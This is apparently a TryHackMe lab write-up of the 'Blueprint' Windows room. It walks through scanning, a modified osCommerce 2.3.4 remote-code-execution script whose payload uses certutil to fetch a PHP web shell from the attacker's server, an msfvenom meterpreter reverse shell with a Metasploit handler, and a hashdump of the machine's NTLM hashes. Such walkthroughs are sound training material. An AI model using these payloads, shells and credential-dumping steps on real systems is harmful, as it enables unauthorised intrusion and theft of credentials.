THM Writeup – Blueprint

April 3, 2022 Titus74

Hack into this Windows machine and escalate your privileges to Administrator.

Room: Blueprint

Difficulty: Easy

Operating System: Windows

Author: MrSeth6797

Do you have what is takes to hack into this Windows Machine?

Add IP address to your hosts file:

echo '10.10.32.200    blueprint.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv blueprint.thm

PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
443/tcp   open  https        syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
3306/tcp  open  mysql        syn-ack ttl 128
8080/tcp  open  http-proxy   syn-ack ttl 128
49152/tcp open  unknown      syn-ack ttl 128
49153/tcp open  unknown      syn-ack ttl 128
49154/tcp open  unknown      syn-ack ttl 128
49158/tcp open  unknown      syn-ack ttl 128
49159/tcp open  unknown      syn-ack ttl 128
49160/tcp open  unknown      syn-ack ttl 128

Get more details about open ports:

nmap -T4 -A -p 80,135,139,443,445,3306,8080,49152-49154,49158-49160 blueprint.thm

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC

Check web application on port 80, browse to http://blueprint.thm

Same as nmap found, of course 🙂

Check web application on port 443, browse to https://blueprint.thm

Explore the oscommerce folder:

When we click on the catalog directory, there is some web site:

It’s probably Oscommerce’s web site

When we click on the docs directory, there is detailed Oscommerce’s documentation:

Now let’s check port 8080, browse to http://blueprint.thm:8080

It looks like the same as on port 443 – when we check it, we’ll find out that it is exactly the same.

As we have Oscommerce 2.3.4 running on http://blueprint.thm:8080/oscommerce-2.3.4/catalog/, let’s check if there is an exploit for this product:

root@ip-10-10-211-38:~# searchsploit oscommerce 2.3.4

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities   | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Inject | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injecti | php/webapps/46330.txt
osCommerce 2.3.4.1 - Arbitrary File Upload    | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution    | php/webapps/44374.py
---------------------------------------------- ---------------------------------

We’re going to use Remote Code Execution, file 44374.py

Locate the exploit and copy it to the current directory:

root@ip-10-10-240-99:~# locate php/webapps/44374.py
/opt/searchsploit/exploits/php/webapps/44374.py
root@ip-10-10-240-99:~# cp /opt/searchsploit/exploits/php/webapps/44374.py .

We need to modify the script – change base_url and target_url so it’s the same where Oscommerce is running in our case, and also add your PHP payload:

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/"
target_url = "http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.10.240.99:8000/shell.php shell.php");'
payload += 'echo $var;'
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.$
else:
    print("[-] Exploit did not execute as planned")

Create a .php file to add cmd query parameter to the application, so we can issue commands to the OS and then run python3 web server:

root@ip-10-10-211-38:~# echo '<?php echo system($_GET["cmd"]); ?>' > shell.php
root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Run the exploit:

root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code

http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

Click on the url provided by the exploit and wait for the execution.

Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami

Ehm, there is a filter. Nvm, we’ll try to bypass it – overwrite shell.php:

root@ip-10-10-240-99:~# echo '<?php echo shell_exec($_GET["cmd"]); ?>' > shell.php

Run the exploit again:

root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code

http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

Visit the link again:

http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

Now browse to http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/shell.php?cmd=whoami

Great, this works and we are privileged nt authority\system user, so let’s upload a reverse shell.

Generate a reverse shell using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.240.99 LPORT=4242 -f exe > shell.exe

Run python http server again:

root@ip-10-10-240-99:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Modify the payload in your exploit script:

Run metasploit and get multi/handler ready:

root@ip-10-10-240-99:~# msfconsole
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.240.99
LHOST => 10.10.240.99
msf5 exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.240.99:4242

Run the exploit again:

root@ip-10-10-240-99:~# python3 44374.py
[+] Successfully launched the exploit. Open the following URL to execute your code

http://blueprint.thm:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

Visit configure.php and wait for the execution:

Now we have a shell on the target machine.

Let’s dump the hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:[REDACTED]:::
meterpreter >

To crack the hash use for example https://crackstation.net/

Now you can answer the first question:

“Lab” user NTML hash decrypted

The root flag should be on the Administrator’s desktop:

meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-04-11 23:36:47 +0100  desktop.ini
100666/rw-rw-rw-  37    fil   2019-04-11 23:40:59 +0100  root.txt.txt

meterpreter > cat root.txt.txt
THM{[REDACTED]}

Do you like this writeup? Check out other THM Writeups.